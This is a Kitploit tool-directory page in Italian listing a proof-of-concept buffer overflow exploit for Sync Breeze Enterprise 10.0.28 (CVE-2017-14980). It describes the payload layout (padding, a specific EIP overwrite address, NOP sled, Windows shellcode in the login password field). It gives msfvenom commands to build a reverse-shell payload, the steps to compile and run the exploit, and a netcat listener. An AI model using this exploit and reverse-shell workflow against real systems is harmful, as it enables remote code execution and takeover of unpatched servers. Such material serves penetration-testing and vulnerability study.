Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Exploit proof-of-concept di buffer overflow per Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Invia un payload HTTP POST appositamente creato per sovrascrivere EIP ed eseguire shellcode x86 personalizzato per l'esecuzione di codice arbitrario. | Kitploit
Strumenti/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingBinary Exploitation
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

CVE-2017-14980_syncbreeze_10.0.28_bof

Exploit proof-of-concept di buffer overflow per Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Invia un payload HTTP POST appositamente creato per sovrascrivere EIP ed eseguire shellcode x86 personalizzato per l'esecuzione di codice arbitrario.

Vedi Repository
231 anno faNon ancora revisionato
Condividi

Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Questa repository contiene un proof-of-concept exploit di buffer overflow (BOF) per Sync Breeze Enterprise versione 10.0.28, che sfrutta la vulnerabilità identificata come CVE-2017-14980.

Descrizione

La vulnerabilità è dovuta a una non corretta validazione dell'input durante l'elaborazione del campo password in una richiesta POST all'endpoint /login.
Un attaccante può inviare un valore eccessivamente lungo in questo campo, che sovrascrive l'EIP e consente l'esecuzione di codice arbitrario.

Questo exploit invia un payload appositamente costruito composto da:

  • 520 byte di riempimento ('A')
  • 4 byte per sovrascrivere l'EIP
  • Un NOP sled di 20 byte
  • Uno shellcode Windows x86, che può essere personalizzato per eseguire comandi arbitrari

Come funziona

  1. L'exploit costruisce un buffer dannoso contenente lo shellcode incorporato.
  2. Invia una richiesta HTTP POST al server vulnerabile con il payload nel campo password.
  • Durante l'elaborazione della richiesta, l'applicazione sovrascrive il puntatore d'istruzione (EIP) ed esegue lo shellcode fornito dall'attaccante.
  • Requisiti

    • Un compilatore C (ad es., gcc)
    • Accesso di rete a un target che esegue Sync Breeze Enterprise 10.0.28
    • Regolazione dell'indirizzo EIP (\x83\x0C\x09\x10) e dello shellcode se necessario

    Esempio di generazione dello shellcode con msfvenom:

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    
    root@kitploit:~
    gcc exploit.c -o exploit
    ./exploit
    
    
    root@kitploit:~
    nc -nlvp 4444
    
    Scarica lo strumento